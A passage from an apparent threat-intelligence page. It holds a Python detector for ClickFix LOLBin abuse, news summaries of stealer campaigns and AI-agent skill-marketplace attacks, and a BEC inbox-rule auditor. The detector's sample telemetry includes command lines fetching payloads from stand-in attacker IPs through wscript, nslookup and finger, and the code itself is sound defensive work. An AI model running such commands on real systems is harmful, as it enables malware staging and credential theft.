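# Resolvers the organisation actually uses (placeholder values).
APPROVED_RESOLVERS = {"10.0.0.53", "10.0.1.53"}
# LOLBins the ClickFix chains on this page are built on.
LOLBIN_MARKERS = ("nslookup", "finger", "syncappvpublishingserver.vbs")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def nslookup_server(command_line: str) -> Optional[str]:
    """Return the explicit server argument of an nslookup command line, if any.

    nslookup syntax is `nslookup [-opt ...] <name> [server]`; a second positional
    argument routes the query around the system's default resolver.
    """
    positional = [t for t in command_line.split()[1:] if not t.startswith("-")]
    return positional[1] if len(positional) >= 2 else None


def classify(ev: ProcEvent) -> list:
    """Return the names of the rules the event matches (empty list if benign)."""
    hits = []
    image = _basename(ev.image)
    parent = _basename(ev.parent_image)
    cmd_lower = ev.command_line.lower()
    from_run_dialog = parent == RUN_DIALOG_PARENT

    # Rule 1: nslookup told to use a resolver that is not one of ours
    # (the variant above hard-codes an external DNS server).
    if image == "nslookup.exe":
        server = nslookup_server(ev.command_line)
        if server is not None and server not in APPROVED_RESOLVERS:
            hits.append("nslookup_unapproved_resolver")

    # Rule 2: the signed App-V script run by a script host with a URL in its
    # arguments, or launched straight from the Run dialog.
    if image in ("wscript.exe", "cscript.exe") and "syncappvpublishingserver.vbs" in cmd_lower:
        if from_run_dialog or re.search(r"https?://", cmd_lower):
            hits.append("syncappv_vbs_remote_loader")

    # Rule 3: finger.exe querying a remote host; it is a legacy utility with
    # no routine business use, so any remote query is worth an alert.
    if image == "finger.exe" and "@" in ev.command_line:
        hits.append("finger_remote_query")

    # Rule 4: a shell started from the Run dialog whose command line names any
    # of the LOLBins above (covers `cmd /c ...` pastes, where the LOLBin's own
    # parent is the shell rather than explorer.exe).
    if image in ("cmd.exe", "powershell.exe", "pwsh.exe") and from_run_dialog:
        if any(marker in cmd_lower for marker in LOLBIN_MARKERS):
            hits.append("run_dialog_lolbin_chain")

    return hits


def scan(events: list) -> dict:
    """Map the index of each suspicious event to the rules it triggered."""
    return {i: h for i, ev in enumerate(events) if (h := classify(ev))}


# Constructed sample telemetry; 203.0.113.0/24 is a documentation range
# standing in for attacker infrastructure.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\nslookup.exe", r"C:\Windows\explorer.exe",
              "nslookup lure.example 203.0.113.5"),                      # 0: hit
    ProcEvent(r"C:\Windows\System32\nslookup.exe", r"C:\Windows\System32\cmd.exe",
              "nslookup -type=mx corp.example 10.0.0.53"),               # 1: benign
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\explorer.exe",
              r'wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "http://203.0.113.7/x"'),  # 2: hit
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Program Files\Vendor\setup.exe",
              r'wscript.exe "C:\Program Files\Vendor\postinstall.vbs"'), # 3: benign
    ProcEvent(r"C:\Windows\System32\finger.exe", r"C:\Windows\System32\cmd.exe",
              "finger user@203.0.113.9"),                                # 4: hit
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
              'cmd /c "nslookup lure.example 203.0.113.5"'),             # 5: hit
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
              "cmd /c ipconfig /all"),                                   # 6: benign
]

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(rules)}")
```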
-
Bitdefender reports a surge in Lumma Stealer activity driven by ClickFix-style fake CAPTCHA campaigns deploying an AutoIt version of CastleLoader, which checks for virtualization and security software before decrypting and launching Lumma Stealer in memory.
First reported: 15.02.2026 16:10 · 1 source, 1 article
- Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging — thehackernews.com — 15.02.2026 16:10
-
CastleLoader campaigns also distribute fake NSIS installers and rogue VBA scripts to deploy Lumma Stealer, using scheduled tasks for persistence.
First reported: 15.02.2026 16:10 · 1 source, 1 article
- Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging — thehackernews.com — 15.02.2026 16:10
-
One CastleLoader domain (`testdomain123123[.]shop`) was identified as a Lumma Stealer C2, suggesting collaboration or shared infrastructure between the two malware families.
First reported: 15.02.2026 16:10 · 1 source, 1 article
- Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging — thehackernews.com — 15.02.2026 16:10
-
Lumma Stealer infections are predominantly observed in India, followed by France, the U.S., Spain, Germany, Brazil, Mexico, Romania, Italy, and Canada.
First reported: 15.02.2026 16:10 · 1 source, 1 article
- Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging — thehackernews.com — 15.02.2026 16:10
-
A macOS ClickFix campaign delivers Odyssey Stealer (a rebrand of Poseidon Stealer) via phishing and malvertising, targeting 203 browser wallet extensions and 18 desktop wallets for cryptocurrency theft.
First reported: 15.02.2026 16:10 · 1 source, 1 article
- Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging — thehackernews.com — 15.02.2026 16:10
-
Odyssey Stealer functions as a full remote access trojan (RAT), using a persistent LaunchDaemon to poll the C2 every 60 seconds for commands, supporting shell execution, reinfection, and SOCKS5 proxy tunneling.
First reported: 15.02.2026 16:10 · 1 source, 1 article
- Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging — thehackernews.com — 15.02.2026 16:10
-
A Windows ClickFix campaign uses fake CAPTCHA pages on compromised legitimate sites to deploy StealC via PowerShell commands.
First reported: 15.02.2026 16:10 · 1 source, 1 article
- Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging — thehackernews.com — 15.02.2026 16:10
-
A macOS email phishing campaign deploys an AppleScript file under the guise of compatibility fixes, stealing credentials and retrieving additional JavaScript payloads by forging TCC authorizations for trusted Apple binaries.
First reported: 15.02.2026 16:10 · 1 source, 1 article
- Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging — thehackernews.com — 15.02.2026 16:10
-
A ClearFake campaign uses fake CAPTCHA lures on compromised WordPress sites to execute an HTA file and deploy Lumma Stealer, also leveraging EtherHiding via BNB Smart Chain contracts to fetch payloads from GitHub.
First reported: 15.02.2026 16:10 · 1 source, 1 article
- Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging — thehackernews.com — 15.02.2026 16:10
-
EtherHiding blends malicious traffic with legitimate Web3 activity, using blockchain immutability to resist takedowns.
First reported: 15.02.2026 16:10 · 1 source, 1 article
- Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging — thehackernews.com — 15.02.2026 16:10
-
Flare reports that macOS infostealers prioritize cryptocurrency theft, exploiting the misconception that 'Macs don’t get viruses' and targeting Keychain, browser storage, and irreversible crypto transactions.
First reported: 15.02.2026 16:10 · 1 source, 1 article
- Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging — thehackernews.com — 15.02.2026 16:10
-
A new malware campaign abuses over 4,000 malicious Google Groups and 3,500 Google-hosted URLs to distribute Lumma Stealer and a trojanized Chromium-based browser named 'Ninja Browser'.
First reported: 15.02.2026 18:30 · 1 source, 1 article
- CTM360: Lumma Stealer and Ninja Browser malware campaign abusing Google Groups — www.bleepingcomputer.com — 15.02.2026 18:30
-
The campaign embeds organization names and industry-relevant keywords in Google Groups posts to increase credibility and drive downloads of malicious payloads.
First reported: 15.02.2026 18:30 · 1 source, 1 article
- CTM360: Lumma Stealer and Ninja Browser malware campaign abusing Google Groups — www.bleepingcomputer.com — 15.02.2026 18:30
-
Attackers use URL shorteners or Google-hosted redirectors via Docs and Drive to evade detection and deliver OS-specific payloads.
First reported: 15.02.2026 18:30 · 1 source, 1 article
- CTM360: Lumma Stealer and Ninja Browser malware campaign abusing Google Groups — www.bleepingcomputer.com — 15.02.2026 18:30
-
For Windows targets, the campaign delivers a 950MB password-protected archive padded with null bytes to evade antivirus file-size scanning thresholds.
First reported: 15.02.2026 18:30 · 1 source, 1 article
- CTM360: Lumma Stealer and Ninja Browser malware campaign abusing Google Groups — www.bleepingcomputer.com — 15.02.2026 18:30
-
The Windows payload reassembles segmented binary files, launches an AutoIt-compiled executable, and decrypts a memory-resident Lumma Stealer payload.
First reported: 15.02.2026 18:30 · 1 source, 1 article
- CTM360: Lumma Stealer and Ninja Browser malware campaign abusing Google Groups — www.bleepingcomputer.com — 15.02.2026 18:30
-
Lumma Stealer exfiltrates browser credentials, harvests session cookies, executes shell commands, and sends data via HTTP POST requests to C2 infrastructure (e.g., healgeni[.]live).
First reported: 15.02.2026 18:30 · 1 source, 1 article
- CTM360: Lumma Stealer and Ninja Browser malware campaign abusing Google Groups — www.bleepingcomputer.com — 15.02.2026 18:30
-
Linux users are redirected to download 'Ninja Browser,' a trojanized Chromium-based browser that silently installs malicious extensions without user consent.
First reported: 15.02.2026 18:30 · 1 source, 1 article
- CTM360: Lumma Stealer and Ninja Browser malware campaign abusing Google Groups — www.bleepingcomputer.com — 15.02.2026 18:30
-
The 'NinjaBrowserMonetisation' extension tracks users via unique identifiers, injects scripts, manipulates cookies, and loads remote content using obfuscated JavaScript (XOR and Base56-like encoding).
First reported: 15.02.2026 18:30 · 1 source, 1 article
- CTM360: Lumma Stealer and Ninja Browser malware campaign abusing Google Groups — www.bleepingcomputer.com — 15.02.2026 18:30
-
The trojanized browser defaults to a Russian-based search engine ('X-Finder') and implements scheduled tasks to poll attacker-controlled servers daily for silent updates.
First reported: 15.02.2026 18:30 · 1 source, 1 article
- CTM360: Lumma Stealer and Ninja Browser malware campaign abusing Google Groups — www.bleepingcomputer.com — 15.02.2026 18:30
-
The campaign is linked to infrastructure including IPs 152.42.139[.]18 and 89.111.170[.]100, and domains such as ninja-browser[.]com, nb-download[.]com, and nbdownload[.]space.
First reported: 15.02.2026 18:30 · 1 source, 1 article
- CTM360: Lumma Stealer and Ninja Browser malware campaign abusing Google Groups — www.bleepingcomputer.com — 15.02.2026 18:30
-
CTM360 attributes the activity to a broader trend of attackers weaponizing trusted SaaS platforms (e.g., Google Groups, Docs, Drive) to evade detection and bypass trust-based filtering.
First reported: 15.02.2026 18:30 · 1 source, 1 article
- CTM360: Lumma Stealer and Ninja Browser malware campaign abusing Google Groups — www.bleepingcomputer.com — 15.02.2026 18:30
Similar Happenings
Trojanized 7-Zip installer distributes proxy malware
A fake 7-Zip website distributes a malicious installer that turns infected computers into residential proxy nodes. The campaign uses a trojanized version of the 7-Zip tool, which includes legitimate functionality but also installs proxy malware. The malware communicates with command-and-control (C2) servers using obfuscated messages and avoids detection by checking for virtualization and debuggers. The threat actor registered the domain 7zip[.]com, mimicking the legitimate 7-Zip website. The malware modifies firewall rules to allow inbound and outbound connections and collects system information, which is sent to a remote server. The campaign also involves trojanized installers for other popular applications like HolaVPN, TikTok, WhatsApp, and Wire VPN.
341 Malicious ClawHub Skills Target OpenClaw Users with Atomic Stealer
A security audit by Koi Security identified 341 malicious skills on ClawHub, a marketplace for OpenClaw users, which distribute Atomic Stealer malware to steal sensitive data from macOS and Windows systems. The campaign, codenamed ClawHavoc, uses social engineering tactics to trick users into installing malicious prerequisites. The skills masquerade as legitimate tools, including cryptocurrency utilities, YouTube tools, and finance applications. OpenClaw has added a reporting feature and partnered with VirusTotal to scan skills uploaded to ClawHub, providing an additional layer of security for the OpenClaw community. The malware targets API keys, credentials, and other sensitive data, exploiting the open-source ecosystem's vulnerabilities. The campaign coincides with a report from OpenSourceMalware, highlighting the same threat. The intersection of AI agent capabilities and persistent memory amplifies the risks, enabling stateful, delayed-execution attacks. New findings reveal that almost 400 fake crypto trading add-ons in the project behind the viral Moltbot/OpenClaw AI assistant tool can lead users to install information-stealing malware. These add-ons, called skills, masquerade as cryptocurrency trading automation tools and target ByBit, Polymarket, Axiom, Reddit, and LinkedIn. The malicious skills share the same command-and-control (C2) infrastructure, 91.92.242.30, and use sophisticated social engineering to convince users to execute malicious commands, which then steal crypto assets such as exchange API keys, wallet private keys, SSH credentials, and browser passwords.
Android Malware Campaign Abuses Hugging Face Platform
A new Android malware campaign leverages the Hugging Face platform to distribute thousands of variants of an APK payload designed to steal credentials from popular financial and payment services. The attack begins with a dropper app called TrustBastion, which uses scareware-style ads to lure victims into installing it. The malware then redirects to a Hugging Face repository to download the final payload, using server-side polymorphism to evade detection. The malware exploits Android’s Accessibility Services to capture screenshots, monitor user activity, and steal credentials. The campaign was discovered by Bitdefender researchers, who found over 6,000 commits in the repository. The repository was taken down but resurfaced under a new name, 'Premium Club,' with the same malicious code. Bitdefender has published indicators of compromise and informed Hugging Face, which removed the malicious datasets. The infection chain begins when users download the malicious Android app TrustBastion, which appears as scareware via popups claiming the device is infected with malware. The dropper app prompts users to run an update that mimics legitimate Google Play and Android system update dialog boxes. The dropper contacts an encrypted endpoint hosted at trustbastion[.]com, which returns an HTML file containing a redirect link to the Hugging Face repository hosting the malware. The malware masquerades as a 'Phone Security' feature to guide users through enabling Accessibility Services. The malware requests permissions for screen recording, screen casting, and overlay display to monitor all user activity and capture screen content. The malware captures lockscreen information for security verification of financial and payment services.
Malicious OpenClaw AI Coding Assistant Extension on VS Code Marketplace
A malicious Microsoft Visual Studio Code (VS Code) extension named "ClawdBot Agent - AI Coding Assistant" was discovered on the official Extension Marketplace. The extension, which posed as a free AI coding assistant, stealthily dropped a malicious payload on compromised hosts. The extension was taken down by Microsoft after being reported by cybersecurity researchers. The malicious extension executed a binary named "Code.exe" that deployed a legitimate remote desktop program, granting attackers persistent remote access to compromised hosts. The extension also incorporated multiple fallback mechanisms to ensure payload delivery, including retrieving a DLL from Dropbox and using hard-coded URLs to obtain the payloads. Additionally, security researchers found hundreds of unauthenticated Moltbot instances online, exposing sensitive data and credentials. Moltbot, an open-source personal AI assistant, can run 24/7 locally, maintaining a persistent memory and executing scheduled tasks. However, insecure deployments can lead to sensitive data leaks, corporate data exposure, credential theft, and command execution. Hundreds of Clawdbot Control admin interfaces are exposed online due to reverse proxy misconfiguration, allowing unauthenticated access and root-level system access. More than 230 malicious packages for OpenClaw (formerly Moltbot and ClawdBot) have been published in less than a week on the tool's official registry and on GitHub. These malicious skills impersonate legitimate utilities and inject information-stealing malware payloads onto users' systems, targeting sensitive data like API keys, wallet private keys, SSH credentials, and browser passwords. Users are advised to audit their configurations, revoke connected service integrations, and implement network controls to mitigate potential risks. A self-styled social networking platform built for AI agents, Moltbook, contained a misconfigured database that allowed full read and write access to all data. The exposure was due to a Supabase API key exposed in client-side JavaScript, granting unauthenticated access to the entire production database. Researchers accessed 1.5 million API authentication tokens, 30,000 email addresses, and thousands of private messages between agents. The API key exposure allowed attackers to impersonate any agent on the platform, post content, send messages, and interact as that agent. Unauthenticated users could edit existing posts, inject malicious content or prompt injection payloads, and deface the site. SecurityScorecard found 40,214 exposed OpenClaw instances associated with 28,663 unique IP addresses. 63% of observed deployments are vulnerable, with 12,812 instances exploitable via remote code execution (RCE) attacks. SecurityScorecard correlated 549 instances with prior breach activity and 1,493 with known vulnerabilities. Three high-severity CVEs in OpenClaw have been discovered, with public exploit code available. OpenClaw instances are at risk of indirect prompt injection and API key leaks, with most exposures located in China, the US, and Singapore.
Multi-Stage AitM Phishing and BEC Campaigns Target Energy Sector
Microsoft has identified a multi-stage adversary-in-the-middle (AitM) phishing and business email compromise (BEC) campaign targeting organizations in the energy sector. The attackers abused SharePoint file-sharing services to deliver phishing payloads and created inbox rules to maintain persistence and evade detection. The campaign leveraged compromised internal identities to conduct large-scale phishing attacks both within and outside the victim organizations. Additionally, the AgreeTo Outlook add-in was hijacked and turned into a phishing kit, stealing over 4,000 Microsoft account credentials. The threat actor deployed a fake Microsoft sign-in page, a password collection page, an exfiltration script, and a redirect, exploiting the add-in's ReadWriteItem permissions. This is the first known instance of malware found on the official Microsoft Marketplace. The add-in had been abandoned by its developer, and the attacker exploited the abandoned domain to serve the phishing kit. The incident highlights the need for better monitoring of add-ins and their associated URLs.
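As an added defensive example, not taken from Microsoft's report or this page, the following Python auditor scans an export of mailbox inbox rules for the patterns BEC actors use for persistence and evasion: forwarding to addresses outside the tenant, and rules that delete or bury messages matching words such as "shared a file" or "suspicious", which would hide replies and alerts generated by phishing sent from the compromised account. The record layout loosely mirrors Exchange's Get-InboxRule fields; the tenant domain, folder names, keywords and sample rules are all constructed assumptions.

```python
"""Flag inbox rules of the kind BEC actors add for persistence and evasion.
Added example: the record shape loosely mirrors Exchange Get-InboxRule
fields; every domain, keyword and sample rule below is constructed."""
from dataclasses import dataclass, field

INTERNAL_DOMAINS = {"example-energy.com"}  # constructed tenant domain
# Folders users rarely open; rules parking mail here hide it from the victim.
SUSPECT_FOLDERS = {"rss subscriptions", "rss feeds", "archive", "conversation history"}
# Words an attacker hides: security alerts and replies to phishing sent from the account.
SUSPECT_KEYWORDS = {"password", "phishing", "suspicious", "shared a file", "sharepoint"}

@dataclass
class InboxRule:
    name: str
    forward_to: list = field(default_factory=list)      # ForwardTo / RedirectTo
    delete_message: bool = False                        # DeleteMessage
    move_to_folder: str = ""                            # MoveToFolder
    contains_words: list = field(default_factory=list)  # Subject/BodyContainsWords
    mark_as_read: bool = False                          # MarkAsRead

def audit_rule(rule: InboxRule) -> list:
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings = []
    external = [a for a in rule.forward_to if a.rsplit("@", 1)[-1].lower() not in INTERNAL_DOMAINS]
    if external:
        findings.append("forwards mail outside the tenant: " + ", ".join(external))
    hides = rule.delete_message or rule.move_to_folder.lower() in SUSPECT_FOLDERS
    hits = {w.lower() for w in rule.contains_words} & SUSPECT_KEYWORDS
    if hides and hits:
        findings.append("hides messages matching " + ", ".join(sorted(hits)))
    if hides and rule.mark_as_read:
        findings.append("marks hidden messages as read")
    if len(rule.name.strip()) <= 1:  # "." or "" rule names are a common attacker tell
        findings.append("rule name is empty or a single character")
    return findings

def audit_rules(rules: list) -> dict:
    """Map rule name -> findings, keeping only rules that produced a finding."""
    return {r.name: f for r in rules if (f := audit_rule(r))}

SAMPLE_RULES = [  # constructed sample export
    InboxRule("Newsletters", move_to_folder="Newsletters", contains_words=["unsubscribe"]),
    InboxRule(".", delete_message=True, mark_as_read=True,
              contains_words=["shared a file", "SharePoint", "suspicious"]),
    InboxRule("Backup", forward_to=["collector@mail-example.net"]),
]
```

Running `audit_rules(SAMPLE_RULES)` flags the "." and "Backup" rules and leaves the newsletter rule alone; in practice the input would come from an exported Get-InboxRule listing for each mailbox under review.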
